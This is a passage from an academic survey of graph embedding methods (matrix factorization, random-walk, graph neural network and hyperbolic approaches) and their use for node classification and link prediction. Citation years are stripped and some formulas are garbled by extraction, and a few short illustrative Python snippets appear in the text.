a neighborhood of vertex vi is defined as a set of adjacent vertices nvi ¼ fvkjaik > ; k ¼ ig thus meaning that vertex itself is not included in its neighborhood. the second-order proximity between a pair of vertices vi and vj describes the similarity measure between their neighborhood structures nvi and nvj with respect to a selected proximity measure. methods for constructing graph embedding we briefly describe graph embedding methods of three general categories, corresponding to the perspective they take on embedding graphs: matrix factorizations, node sequence methods and deep learning based methods. these are, of course, not mutually exclusive, but it is more convenient to adhere to their primary features. we also cover a specific type of embeddings based on embedding space metric. we select papers from several curated lists and major conferences on network science, artificial intelligence, machine learning and data mining, as well as core research publishers and indexing services. paper sources are referred in table . we used the following keywords: graph/network embeddings, graph/network representation, graph neural networks, graph convolutional networks, graph convolution, graph attention, makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ graph/network classification/link prediction/clustering, deep learning for graphs, geometric deep learning, gcn, gnn, gat. historically the first graph embedding methods were factorization based, which generally try to approximate a large matrix with a low-rank matrix factorized into a product of two matrices containing representations, thus modeling each entry of the original matrix with an inner product of representations. sequence-based embeddings linearize the graph using random walks or diffusion and maximize the probability of observing the neighborhood (context) of a node given its embedding. deep learning-based models learn a function mapping a graph in the numeric form to a low-dimensional embedding by optimizing over a broad class of expressive neural network functions. dimensionality reduction (matrix factorization) methods definition (matrix factorization) is a decomposition of a matrix to the product of matrices. in this sense, the first matrix in series is named self node representation and the last matrix refers to node context. table paper sources. name link description curated lists by chen https://github.com/chihming/ awesome-network-embedding by rozemberczki https://github.com/benedekrozemberczki/ awesome-graph-classification by rebo https://github.com/maxwellrebo/ awesome- vec by soru https://gist.github.com/mommi / awesome-kge conferences complex networks https://complexnetworks.org/ international conference on complex networks and their applications the web https://www .thewebconf.org/ the web conference is international conference on the world wide web. 
wsdm http://www.wsdm-conference.org/ web-inspired research involving search and data mining ijcai https://www.ijcai.org/ international joint conferences on artificial intelligence aaai https://www.aaai.org/ association for the advancement of artificial intelligence icml https://icml.cc/ international conference on machine learning sigkdd https://www.kdd.org/ special interest group in knowledge discovery and databases domain conferences acl http://www.acl .org/ association for computational linguistics cvpr http://cvpr .thecvf.com/ conference on computer vision and pattern recognition publishers acm dl https://dl.acm.org/ full-text articles database by association for computing machinery ieee xplore https://ieeexplore.ieee.org/xplore/home.jsp research published by institute of electrical and electronics engineers link springer https://link.springer.com/ online collection of scientific journals, books and reference works indexing services scopus https://www.scopus.com/ abstract and citation database web of science https://www.webofknowledge.com/ citation indexer scholar google https://scholar.google.com/ web search engine for indexing full-text papers or its metadata makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/chihming/ https://github.com/benedekrozemberczki/ https://github.com/maxwellrebo/ https://gist.github.com/mommi / https://complexnetworks.org/ https://www .thewebconf.org/ http://www.wsdm-conference.org/ https://www.ijcai.org/ https://www.aaai.org/ https://icml.cc/ https://www.kdd.org/ http://www.acl .org/ http://cvpr .thecvf.com/ https://dl.acm.org/ https://ieeexplore.ieee.org/xplore/home.jsp https://link.springer.com/ https://www.scopus.com/ https://www.webofknowledge.com/ https://scholar.google.com/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ factorization models are common techniques in different machine learning domains to receive meaningful low-dimensional representation. moreover, a lot of methods use similarity matrix between observations, which can also be reformulated as the graph similarity matrix. factorization techniques can be applied to a different graph representations and optimize different objectives. some methods directly decompose the adjacency matrix a, for example, mds (kruskal & wish, ) reconstructs it by minimizing mse between element aij and euclidean distance between vectors ui and uj of manifold u. we can rewrite this with expression pn i¼ pn j¼ aij � kui � ujk � � . lsi (deerwester et al., ) simply applies singular value decomposition to a golub & reinsch ( ). in wold, esbensen & geladi ( ) the manifolds are learned by maximizing variance for linear mixture. it is extended by lda martinez & kak ( ). another way to use dimensionality reduction is to build proximity matrix of the graph. for example, isomap (tenenbaum, de silva & langford, ) use shortest path matrix d and apply mds to learn embeddings. lle (roweis & saul, ) learns node similarity by reconstructing weights matrix w with which neighboring nodes affect each other: kx � wtuk and repeats that procedure to learn manifold u with achieved matrix w. lpp (he & niyogi, ) estimates the weighted matrix w as heat kernel and learn manifold u by reduction of w with laplacian eigenmaps technique. isomap and lle were proposed to model global structure while preserving local distances or sampling from the local neighborhood of nodes. 
the lower bound for methods complexity was quadratic in the number of vertices, still making them inappropriate for large networks. definition (graph laplacian) if matrix d is the diagonal degree matrix, that is d ¼ diagð�jaijÞ, then laplacian matrix can be defined as l = d − a. another approach for spectral graph clustering (chung & graham, ) was suggested in belkin & niyogi ( ) named laplacian eigenmaps (le), representing each node by graph laplacian eigenvectors associated with its first k nontrivial eigenvalues. the goal for laplacian eigenmaps class of models lies in preserving first-order similarities. thus, a model gives a larger penalty using graph laplacian if two nodes with larger similarity are embedded far apart in the embedding space. laplacian objective function is symmetric in each pair (i, j), and thus it cannot capture edge orientations. kernel eigenmaps (brand, ) extends this approach to nonlinear cases. in contrast to le, which preserved nodes dissimilarity, cauchy embedding (luo et al., ) proposes optimization condition modification which preserves the similarity between vertices. structure preserving embedding (spe) (shaw & jebara, ) aims to use le combined with preserving spectral decomposition representing the cluster structure of the graph. it introduces a new graph kernel and applies svd to it. graph factorization (gf) (ahmed et al., ) try to solve the scalability issue of factorization methods by decreasing node neighborhood via graph partitioning and utilizing distributed computation. the models in this class can be either symmetric and obtain final representations only from embedding matrix. grarep (cao, lu & xu, ) consider k-hop neighborhood (ak) makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ using svd decomposition of ak. hope (ou et al., ) is specific asymmetric transitivity preserving graph embedding. it is found that most asymmetric similarity measures can be formulated as s ¼ m� g ml. katz index refers to mg = i − βa, ml = βa. rooted pagerank can be stated as mg = i − αp, ml = ( − α) p. common neighbors is represented by mg = i, ml = a , and adamic-adar with mg = i, ml = a· d· a. to avoid calculation of similarity matrix authors propose to use generalized svd and directly estimate matrices mg and ml. abu-el-haija, perozzi & al-rfou ( ) proposed to use concatenation of two node representations capturing in- and out-connections. authors of wang et al. ( d) proposed a modularized nonnegative matrix factorization (m-nmf) model to preserve the community structure in network representation. in atp model (sun et al., ) authors embed directed graph constructing two vectors for each node via factorization framework. kefato, sheikh & montresor ( ) propose multi-objective framework for preserving directed nature of graph. sdne (wang, cui & zhu, ) uses autoencoders (as neural network based dimension reduction technique) to capture non-linear dependencies in local proximity. factorization based models are the best-studied theoretically and provide a well-known general framework for graph embedding optimization (liu et al., ), however, they suffer from high computational complexity for large graphs and often capture only a small-order proximity perozzi, al-rfou & skiena ( ). sequence-based approaches definition (random walk on graph) is a sequence of nodes obtained from the random process of node sampling. usually, probability of choice of node j after node i is proportional to ai,j. 
motivated by drawbacks of the matrix factorization approach, another approach emerged that attempts to preserve local neighborhoods of nodes and their properties based on random walks (newman, ; pirotte et al., ). more specifically, the main idea is to maximize the probability of observing the neighborhood of a node given its embedding, following the line of skip-gram model initiated in nlp applications by mikolov et al. ( ), pennington, socher & manning ( ). an objective of this type can be efficiently optimized with stochastic gradient descent on a single-layer neural network, and hence has lower computational complexity. definition (skip-gram) is method to learn sequence element i representation via maximization of probability of elements in context of i based on representation of i. two prominent examples of models in this class are node vec (grover & leskovec, ) and deepwalk (perozzi, al-rfou & skiena, ). deepwalk performs a random walk over a graph and then uses sampled sequences to learn embeddings, using the skip-gram objective (while having modifications for other nlp based sequence models, such as using glove from brochier, guille & velcin ( )). its predecessor line (tang et al., ) is equivalent to deepwalk when the size of vertices’ contexts is set makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to one. node vec extends the random walk with biasing parameters of bfs or dfs parameters. another way of sampling based on diffusion was presented in diff vec (rozemberczki & sarkar, ). by virtue of sampling being more centered around source nodes, it provides robust embeddings while being less flexible. walklets (perozzi, kulkarni & skiena, ) as a generalization of grarep (cao, lu & xu, ) use weighted combination of embeddings of powers of adjacency matrix a, a , …, ak to reduce the bias of deepwalk for low-order proximities, and approximates computing ai by skipping nodes using short random walks (perozzi et al., ). the focus on the local structure and non-convex optimization requiring the use of stochastic gradient descent and proper initialization limit random walk based methods in capturing the hierarchical structure of a graph. harp (chen et al., b) proposes a meta-strategy for graph embedding under recursive construction of nodes and edges into condensed graphs with similar global structure. these graphs are used as source initializations for embedding detailed graphs, resulting in the end in proper node and edge embeddings, which can be adopted for improving deepwalk (perozzi, al-rfou & skiena, ), line (tang et al., ), and node vec (grover & leskovec, ) algorithms. it was further generalized for community preserving using modularity maximization (tang & liu, ) and supporting large free-scale networks (feng et al., ). alternatively, struct vec (ribeiro, saverese & figueiredo, ) uses structural similarity without using node or edge attributes but considering graph hierarchy to measure similarity at different scales. liu et al. ( c) uses rooted substructures of a graph to preserve structural similarity. diffusion wavelet model to capture structural proximity was suggested in donnat et al. ( ). another approach to control hyper-parameters in random-walk methods is graph attention (abu-el-haija et al., ) learning multi-scale representation over adjacency matrix powers with the probabilistic approach for learning balancing weights for each power. 
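Before moving to deep models, a short sketch of the biased transition rule that gives node2vec its BFS/DFS interpolation: the unnormalised weight of a candidate next node is divided by p when stepping back to the previous node, kept as-is for neighbours of the previous node, and divided by q otherwise. The weighting follows Grover & Leskovec; the toy graph, parameter values and dict representation are illustrative, and the sampled walks would then be fed to a word2vec-style skip-gram trainer to obtain the embeddings.

```python
import random

def node2vec_step(adj, prev, cur, p, q, rng=random):
    """One second-order biased step from `cur`, conditioned on the previous node."""
    candidates, weights = [], []
    for x, w in adj[cur].items():
        if x == prev:
            weights.append(w / p)          # return to the previous node
        elif x in adj[prev]:
            weights.append(w)              # stay close (BFS-like move)
        else:
            weights.append(w / q)          # move outward (DFS-like move)
        candidates.append(x)
    return rng.choices(candidates, weights=weights, k=1)[0]

def node2vec_walk(adj, start, length, p=1.0, q=1.0, rng=random):
    """Sample one biased walk of at most `length` nodes."""
    walk = [start]
    if length == 1:
        return walk
    first = rng.choices(list(adj[start]), weights=list(adj[start].values()), k=1)[0]
    walk.append(first)                      # first step is an ordinary weighted step
    while len(walk) < length:
        walk.append(node2vec_step(adj, walk[-2], walk[-1], p, q, rng))
    return walk

adj = {0: {1: 1.0, 2: 1.0}, 1: {0: 1.0, 2: 1.0, 3: 1.0}, 2: {0: 1.0, 1: 1.0}, 3: {1: 1.0}}
print(node2vec_walk(adj, start=0, length=8, p=0.5, q=2.0))
```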
it was further generalized to its deep learning analog in veličković et al. ( ) and liu et al. ( a), see also lee et al. ( ) for details on attention models on graphs. extension of deepwalk to heterogeneous networks was suggested in metapath vec (dong, chawla & swami, ). modifications of random-walk based methods using node attribute concepts and node proximities were suggested in genvector (yang, tang & cohen, b). with gemsec (rozemberczki et al., ), the authors extend sequence-based methods with additional k-means objective encouraging clustering structure-preserving in the embedding space and improving overall performance. discriminative deep random walk (ddrw) (li, zhu & zhang, ) was suggested for the task of attributed network classification. Çelikkanat & malliaros ( ) generalizes random walk based methods to the case of the exponential family of distributions for sampling strategies. sequence-based models, such as node vec, can obtain high-quality embeddings of structural input graph by sampling node sequences and learning context-consistent embeddings but are not able to capture additional node/edge features while being transductive by their nature. makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ deep learning: graph convolutions complex non-regular graphs structure makes graph filtering not as simply defined as on images. in the past decades, researchers have been working on the graph signal processing methods including filtering, wavelets, fourier transformations using graph spectral domain. the studies on these methods can be found in shuman et al. ( ), ortega et al. ( a). advances in deep learning have led to a new field of studies devoted to applying neural networks to graph data (scarselli et al., ; li et al., a, b). recently, sdne (wang, cui & zhu, ) and dngr (cao, lu & xu, ) use deep autoencoder to capture non-linearity in graphs and simultaneously apply dimension reduction for constructing graph embedding. sdne use autoencoder preserving first order proximity and laplacian eigenmaps for penalizing long distances for embedding vectors of similar vertices. dgnr uses stacked denoising autoencoders over positive pointwise mutual information matrix obtained from similarity information based on random surfing. both methods use global information and thus are not appropriate for large networks. kipf & welling ( a) propose graph convolutional layer that offers a further simplified approximation to spectral convolution and achieves better computational efficiency for semi-supervised multi-class node classification is applicable for the other machine learning tasks. a model of several such convolutions is referred to as graph convolutional network (gcn). improvements over speed and optimization methods of training gcns were suggested in chen, zhu & song ( ), chen, ma & xiao ( ). stochastic approaches for network embedding optimization were briefly over-viewed in lei, shi & niu ( ). assume the graph g(v,e), adjacency matrix a and feature matrix x of size (nnodes, nfeatures), where nnodes refers to number of vertices and nfeatures to number of node attributes. then, gcn can be defined as set of hidden layers hi = σ(ahi− wi− ) where h is equal to matrix x, wi is learnable weight matrix. at the next hidden layer, these features are aggregated using the same propagation rule. it means that graph convolutions aggregate feature information of its neighbors based on the adjacency matrix. 
the idea of graph convolutions using spatial convolutions (operating with adjacency matrix) or spectral graph methods (operating with graph laplacian) was proposed in bruna et al. ( ), duvenaud et al. ( ), henaff, bruna & lecun ( ), niepert, ahmed & kutzkov ( ), defferrard, bresson & vandergheynst ( ), levie et al. ( ), while extending the gcn idea to recurrent models li et al. ( c), monti, bronstein & bresson ( ), mixture models of cnns monti et al. ( ); fey et al. ( ), diffusion convolutions atwood & towsley ( ); li et al. ( c), and models suitable for dynamic graphs under inductive learning paradigm natarajan & dhillon ( ); hamilton, ying & leskovec ( a). all the methods suggest semi-supervised embedding, however, choosing unique labels for each vertex one may obtain an unsupervised version of network embedding. the graphsaint (zeng et al., ) provides a solution for scalability problem in training graph neural networks. it compares different topology-based sampling algorithms makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (node, edge and random walks) in terms of bias and variance of learned gcn model. it also introduces unbiased estimator for node aggregation. another idea is to use deep autoencoders to learn compressed representations that capture the essence of the graph structure. an autoencoder includes two nonlinear functions, an encoder and a decoder, and attempts to minimize reconstruction loss. one such model specifically designed for graphs is gae, which consists of a gcn encoder (one or two stacked gcn layers in most use cases) that produces embeddings and an inner product decoder that reconstructs the adjacency matrix (â ¼ rðuutÞ, where σ is non-linearity like sigmoid function and u is embedding matrix of nodes). the weights of the model are trained by backpropagating the reconstruction loss, which is usually mean squared error (mse). vgae (kipf & welling, b) is a probabilistic counterpart of gae. it introduces a distribution over latent variables z, with these variables being conditionally independent gaussians given a and x with means (μ) and diagonal covariances (σ) being parameterized by two gcn encoders (kingma & welling, ). as in the case of images, vgae just adds kl-divergence term between conditional distribution q(z|x,a) and unconditional p(z) ∼ n( , ) to the loss. after node embeddings are reconstructed via random normal distribution sampling, that is, z = μ + σε. then adjacency matrix is decoded using inner product of achieved vector z as in simple gae. in very recent work, authors of graphsage (hamilton, ying & leskovec, a) offer an extension of gcn for inductive unsupervised representation learning and offer to use trainable aggregation functions instead of simple convolutions applied to neighborhoods in gcn. graphsage learns aggregation functions for a different number of hops that are applied to sampled neighborhoods of different depths, which then are used for obtaining node representations from initial node features. pinsage (ying et al., a) extends the previous algorithm with the importance sampling based on random walks. importance score is calculated simply as visit counts. it provides better scalability and quality. gat (veličković et al., ) use masked self-attention layers for learning weights balancing impact of neighbors on node embedding, and supporting both, inductive and transductive learning settings. in liu et al. 
( a), authors suggested specific layers controlling the aggregation of the local neighborhood over bfs and dfs sampling, thus generalizing node vec (grover & leskovec, ) model to graph neural networks. similar to gcn, gat contains several hidden layers hi = f(hi − , a), where h is a graph node features. in each hidden layer linear transformation of input is firstly calculated with the learnable matrix w. the authors replace the adjacency matrix by learnable self-attention in form of a fully-connected layer with activation and further normalization with softmax. generalization of gated recurrent graph neural networks (li et al., c) was suggested in message passing neural network (mpnn) (gilmer et al., ) providing a differentiable way to combine information from neighbours. nowadays, many advanced deep neural network models are adapted to graph data. graph generative adversarial networks were suggested in ding, tang & zhang ( ) and yu et al. ( ). in you et al. ( ), recurrent graph neural network was suggested for the task of graphs generation. pooling operators for graphs were used in makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ defferrard, bresson & vandergheynst ( ), ying et al. ( b). yuan & ji ( ) modernize classic pooling to account graph structure using conditional random fields. adversarially regularized variational graph autoencoder (arvga) was suggested in pan et al. ( ). zhu et al. ( a) develop the dggan model that jointly learns source and target vectors for the directed graphs employing adversarial techniques. liu ( ) builds anonymized gcn with adversarial training to be robust to the noise attacks. hettige et al. ( ) propose the rase model, that applies gaussian denoising attribute autoencoder for achieving robustness of received embedding, while laakom et al. ( ) catches the uncertainty by learning probability gaussian distributions over embedding space. weng, zhang & dou ( ) employs adversarial training for variational graph autoencoder. zhu et al. ( b) use node feature smoothing for learn better embeddings. jing et al. ( ) designs variable heat kernel to learn robust representations. deep learning models are now a study of vulnerability to adversarial attacks, in particular, it relates to structural data. the first approaches for detection of node/edge add/remove mechanisms were studied in bojcheski & günnemann ( ), chen et al. ( c), while other researchers focused on methods for unsupervised (sun et al., b), semi-supervised (chen et al., e) and supervised (zügner, akbarnejad & günnemann, ) scenarios of graph embedding construction, and application for ml problems. the black-box approach was formulated in dai et al. ( ) and further covered in general overview for the problem of graph data poisoning (chen et al., b) and its applications to social media data (zhou et al., ) and knowledge graphs (zhang et al., b). a survey of methods for defense from adversarial attacks on graphs was suggested in sun et al. ( a). the deep learning models propose a new way of approximation for classic graph convolutions and kernels, which allows extracting embeddings faster. a mixture of it with semi-supervised techniques gives the state-of-the-art results in terms of scalability, speed and quality on downstream tasks. hyperbolic (non-euclidean) embeddings the euclidean space is not the best for structures like graphs, because has the low descriptive ability for hierarchical and scale-free structures. 
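one concrete example of such a non-euclidean space is the poincaré ball model of hyperbolic space, used by several of the methods discussed in this subsection. a minimal sketch of its distance function is given below; the toy vectors are illustrative only.

```python
import numpy as np

def poincare_distance(u, v, eps=1e-9):
    """Distance in the Poincare ball: arcosh(1 + 2*||u-v||^2 / ((1-||u||^2)(1-||v||^2)))."""
    sq_u = np.sum(u * u)
    sq_v = np.sum(v * v)
    sq_diff = np.sum((u - v) ** 2)
    x = 1.0 + 2.0 * sq_diff / ((1.0 - sq_u) * (1.0 - sq_v) + eps)
    return np.arccosh(x)

# points close to the boundary of the unit ball are exponentially far apart,
# which is what makes this space well suited to tree-like (hierarchical) graphs
u = np.array([0.1, 0.2])
v = np.array([0.7, -0.6])
print(poincare_distance(u, v))
```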
so, researchers have considered other space, that can successfully represent it in a comparatively low number of dimensions, saving the basic properties like angles. it allows using classical machine learning methods in down-streamed tasks. in certain cases, embedding into non-euclidean spaces may be beneficial for model performance (kleinberg, ; shavitt & tankel, ; krioukov et al., ). les were also used for constructing embedding in hyperbolic space (alanis-lobato, mier & andrade- navarro, ). deep learning approach was applied for hyperbolic embedding in chamberlain, clough & deisenroth ( ). there is no exact research on the properties of embedding spaces, but researchers mostly pay attention to preserving low dimensional space, catching graph properties and model quality trade-off. makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ specific embeddings based on network types in this section, we show specific embedding models generalizing core methods of network representation to a certain domain of networks and applications based on the network type. attributed networks real-world networks are often accompanied with additional features for nodes and edges, such as labels, texts, images. these attributes tend to be correlated for close graph structures and could affect network embedding by adding additional information for the similarity of nodes. the attributes are usually represented by high-dimensional vectors of features (which are sparse for just label attributes). once the attributes are represented by their embeddings, the task is to incorporate them in network embedding model (under unsupervised or semi-supervised framework). the authors of tadw (yang et al., ) represent deepwalk model as matrix factorization and incorporate text attributes into factorization framework. ple (ren et al., ) jointly learns the representations of entity types and links together with text features. in le & lauw ( ), a generative model for document network embedding was suggested based on topic modeling of documents using relational topic model (rtm) (chang & blei, ) and the relationships between the documents. in ganguly et al. ( ), authors combine text and network features for co-authorship recommendations. augmented relation embedding (are) (lin, liu & chen, ) adds content-based features for images using graph-laplacian spectral embedding modification. in geng et al. ( ), zhang et al. ( , ), authors suggested to embed images, textual and network information for modeling user-image interaction. in addition to structural similarity, in certain cases feature similarity may be also important. two-layered network embedding for node-to-node and text-to-text similarities was suggested in sun et al. ( ). in zhang et al. ( b), the authors proposed the hsca model, embedding homophily, network topological structure and node features simultaneously. in deepbrowse (chen, anantharam & skiena, ), the authors suggested using deepwalk-based node similarity together with priority ranking for recommender system based on an interaction graph. label preserving attribute node embedding was suggested in tri-party deep network representation (pan et al., ). modifications of random-walk based methods using node attribute concepts and node proximities were suggested in genvector (yang, tang & cohen, b). 
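a naive but common unsupervised baseline for attributed networks is to simply concatenate a structural embedding with a compressed representation of the node attributes before the downstream model. the sketch below assumes scikit-learn, a precomputed structural embedding matrix and a tf-idf attribute matrix (both hypothetical inputs); it is not equivalent to the joint models above, such as tadw, which couple the two information sources during training.

```python
import numpy as np
from sklearn.decomposition import TruncatedSVD
from sklearn.preprocessing import normalize

def combine_structure_and_attributes(structural_emb, attribute_matrix, attr_dim=64):
    """Concatenate structural node embeddings with an SVD-compressed attribute matrix."""
    svd = TruncatedSVD(n_components=attr_dim, random_state=0)
    attr_emb = svd.fit_transform(attribute_matrix)     # dense low-rank attribute features
    return np.hstack([normalize(structural_emb), normalize(attr_emb)])

# structural_emb: (n_nodes, d) array, e.g. from the random-walk sketch above
# attribute_matrix: (n_nodes, n_features) sparse tf-idf matrix of node texts
```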
label attributes are also an important part for such problems as classification of nodes and edges, or community information (assigning each node a community label). community preserving network embeddings were suggested in shaw & jebara ( ), wang et al. ( d) and rozemberczki et al. ( ). incorporating group information was presented in gene model (chen, zhang & huang, b) under a supervised framework. semi-supervised frameworks for learning network embedding under loss constraints for labeled data were suggested in planetoid (yang, cohen & salakhutdinov, a) max-margin deep walk (tu et al., ) and lane (huang, li & hu, ). makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ heterogeneous networks a heterogeneous network presents a different concept of graph representation, in which nodes and edges may have different types (or even multiple edges). the heterogeneous network embeddings either learn embeddings in the same vector space (li, ritter & jurafsky, ; zhao, liu & sun, ), or construct the embeddings separately for each modality and then aggregate them into one space, such as hne model (chang et al., ) and tang & liu ( ), or even aggregate over multiple network layers (xu et al., ) or different relation features (huang, li & hu, ). random-walk based approach for different node types based on deepwalk was presented in metapath vec (dong, chawla & swami, ). similar approaches based on meta-path random walks for graph embedding were suggested in huang & mamoulis ( ), chen & sun ( ). jacob, denoyer & gallinari ( ) use heterogeneous network embedding for node classification across different node types. a similar problem was posed for author identification on double-blind review scenario (chen & sun, ). study by jiang et al. ( ) provides a framework for efficient task-oriented skip-gram based embeddings. hu, fang & shi ( ) utilizes the generative adversarial networks, which learn node distributions for efficient negative sampling. shi et al. ( ) proposes a method for automatic meta-path construction. cao et al. ( ) use the graph attention mechanism for heterogeneous graph embedding task. magnn architecture (fu et al., ) extends simple attention mechanism with several levels: node attributes, inter meta-path information and intra meta-path semantic information. dyhan (yang et al., ) presents the model for dynamic heterogeneous graphs with hierarchical attention. another way to use the attention mechanism in dynamic heterogeneous networks is the li et al. ( b). it employs three types of attention: structural, semantic and temporal. heterogeneous graph embeddings are widely used in real-world applications. hong et al. ( ) estimates the arrival time for transportation networks, ragesh et al. ( ) use it in text classification. chen & zhang ( ), li et al. ( a) utilizes hin embedding for multi-modal data fusion task. zhang et al. ( a) preserves the relationships in hin. a survey on heterogeneous networks can be found in wang et al. ( a). signed networks in a signed network, each edge is associated with its weight, taking values from the set { , − }, which usually represents belief or opinion sentiment for different relations types. these networks are specifically considered apart from heterogeneous networks as important objects for social network analysis, although they are still just a specific type of such networks. one of the tasks on such networks is predicting links and their signs (liu et al., a). 
sine (wang et al., c) is a dnn model aiming at close relationships with friends (positive weight) rather than with foes (negative weight). for highly positive social networks a virtual node with negative relation is proposed to use in the model, which uses pairwise similarities optimization under constraint mentioned above. in yuan, wu & xiang ( ), the authors propose a local neighborhood aggregation model sne for each makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ type of positive and negative relations. kim et al. ( ) propose random-walks based model side for signed directed networks. also, they provide socio-psychological interpretation for each term in the loss function. signet (islam, prakash & ramakrishnan, ) develops new target node sampling for more efficient learning. in oppose to previous works, lu et al. ( ) provides signed network embedding powered by status theory (leskovec, huttenlocher & kleinberg, ). it natively works with directed networks by preserving node ranking except direct node similarity. multi-layer networks multi-layer networks are used to model complex systems with different levels of interaction between nodes, for example, whole airline network with different carriers. each layer in such networks corresponds to different types of relationships. liu et al. ( a) compare three aggregation methods for single-layer network embedding models: merging of different layers in one network, single-layer vectors concatenation and between-layer random walks. the best results show the last method named layer co-analysis because it allows learning between-layer interactions. in xu et al. ( ) authors provide an example of coupling into joint space two separately learned heterogeneous networks embeddings. ione (liu et al., ) preserves users similarity based on their followers and followees for several social networks. a hierarchy-aware unsupervised node feature learning approach for multi-layer networks was proposed in zitnik & leskovec ( ). in li et al. ( ) authors develop the single optimization framework for both within-layer and between-layer communication. it exploits spectral embedding and the block model. temporal networks a lot of real-world networks are evolving over-time. most of the described above methods concentrate on the static embeddings, so it works poorly in the temporal scenario. haddad et al. ( ) propose the adaptation of node vec model to the dynamic case. authors also introduce the task-specific temporal embeddings. rossi et al. ( a) provide the generic framework named temporal graph networks for deep learning on dynamic graphs. fathy & li ( ) apply the graph attention to the temporal networks. zhong, qiu & shi ( ) develop the model for efficient community mining. rokka chhetri & al faruque ( ) present the model for dynamic physics graphs. ctgcn model (liu et al., a) generalizes graph convolution networks with feature transformation and aggregation. it builds the hierarchical representation of the graph with k-cores and applies gcn to it. goyal, chhetri & canedo ( ) use the recurrent neural networks to catch the dynamics. there is one more specific graph type: temporal interaction networks, such as user-item interactions in the recommender systems. zhang et al. ( b) creates the embedding approach for such graph utilizing coupled memory networks. nowadays, methods based on smart neighborhood aggregation, such as limiting random walks over clusters chiang et al. 
( ) and precomputing diffusion-based neighborhoods for one-layer gcn rossi et al. ( b) show great performance over existing approaches, thus combining advances in deep learning and neighborhood sampling methodology. makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ large graphs we have already mentioned that random walks and graph neural networks were proposed as the approximations for the different classic matrix factorization techniques. so in this section, we will discuss approaches to scale up gnn training. the basic idea implemented in different papers is a sampling. graphsage (hamilton, ying & leskovec, a) learns trainable aggregations for sampled node neighbourhood. this approach was further improved with fixed-length random walk based importance sampling of the neighborhood in ying et al. ( a). graphsage also provides the idea of minibatch training for gnns. a similar idea was proposed in the chen, ma & xiao ( ). salha, hennequin & vazirgiannis ( ) propose to use linear aggregation over direct neighbors to simplify computations. the graphsaint (zeng et al., ) compares different topology-based sampling algorithms (node, edge and random walks) in terms of bias and variance of learned gcn model. it also introduces unbiased estimator for aggregation of node and normalizes propagation by this value, that solves the scalability problem. nie, zhu & li ( ) is based on the idea of locality preserving projection. it works with anchor-based proximity matrices and calculates these anchors via balanced and hierarchical k-means. such an approach allow to reduce complexity from n d to ndm where n is a number of samples, d is embedding dimension and m is a number of anchors. akyildiz, aljundi & kaya ( ) extends the verse (tsitsulin et al., ) with graph partitioning and coarsening to provide fast embedding computation on the gpu. atahan akyildiz, alabsi aljundi & kaya ( ) analyzes effects of graph coarsening on different embeddings in comparison to gosh. another distributed training framework was presented in zheng et al. ( a). it also provides efficient graph partitioning schemes for reducing between-machine communication. gallicchio & micheli ( ) keeps the graph embedding as the dynamical systems and study the embedding stability issue. authors found that stable initialization allows to left weights untrained in deep sparse networks. lu & chang ( ) use softmax clustering for modularity maximization. they show that such a method is a linear approximation for main eigenvectors. application of graph embeddings to machine learning problems here, we aim to overview core machine learning problems involving structural data. we start with problems related to small graph motifs such as nodes and edges, while further going to the problems connected to subgraphs and graphs as a whole. node classification definition (node classification) for a given graph g(v, e) with known labels for some of nodes from v, node classification is the task of predicting missing labels for existing or newly added nodes. node classification deals with assigning class labels to nodes based on labeled nodes data (zhu et al., ; bhagat, cormode & muthukrishnan, ). the structural information is used in a context that “similar” nodes should have the same/similar labels. the original makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ framework uses label propagation based on random walks statistics (xiaojin & zoubin, ; azran, ; baluja et al., ). in an unsupervised framework, each node is embedded in a low-dimensional space following by training a classifier on the set of labeled node embedding vectors (lu & getoor, ; bhagat, cormode & rozenbaum, ). authors use such machine learning models as logistic regression (perozzi, al-rfou & skiena, ; pimentel, veloso & ziviani, ), svm (wang, cui & zhu, ; wang et al., d), knn (le & lauw, ; wilson et al., ), random forest and xgboost (makarov et al., ; makarov et al., c); the choice is usually made based on the size of training data, interpretability of features and embedding dimension. in semi-supervised framework, node embeddings are learned via loss function containing regularization for labeled data predictions, penalizing “similar” nodes to have different labels (li, zhu & zhang, ; yang, cohen & salakhutdinov, a; tu et al., ; kipf & welling, a; monti et al., ). zhang, zhou & li ( ) proposes hierarchical gcn and pseudo-labeling technique for learning in scarce of annotated data. liu et al. ( b) proposes a sampling strategy and model compression for handling sparsity of labels. chen et al. ( ) employs contrastive learning techniques to achieve semi-supervised parametrized fusion of graph topology and content information. zhu et al. ( c) also use metric learning approach but applies it to corrupted graph substructures. nozza, fersini & messina ( ) use two-phase optimization for attributed graph embedding. shi, tang & zhu ( ) aligns topology of attribute content network to the corresponding graph to simultaneously learn good embeddings. wang et al. ( b) propose two models for the imbalanced scenarios. a survey on classic techniques for node classification can be found in bhagat, cormode & muthukrishnan ( ). link prediction definition (link prediction problem (lpp)) is a task of completing missing edges in noisy graphs or predicting new edges in temporal network structures. formally, lpp for given graph g(v, e) with adjacency matrix a is a task of learning such function f that reconstruct or predict next adjacency matrix a based on different graph features such as metrics (e.g., jaccard, adamic-adar), graph embeddings. network science approach to the problem of predicting collaborations results in the link prediction (lp) problem (liben-nowell & kleinberg, ) for temporal 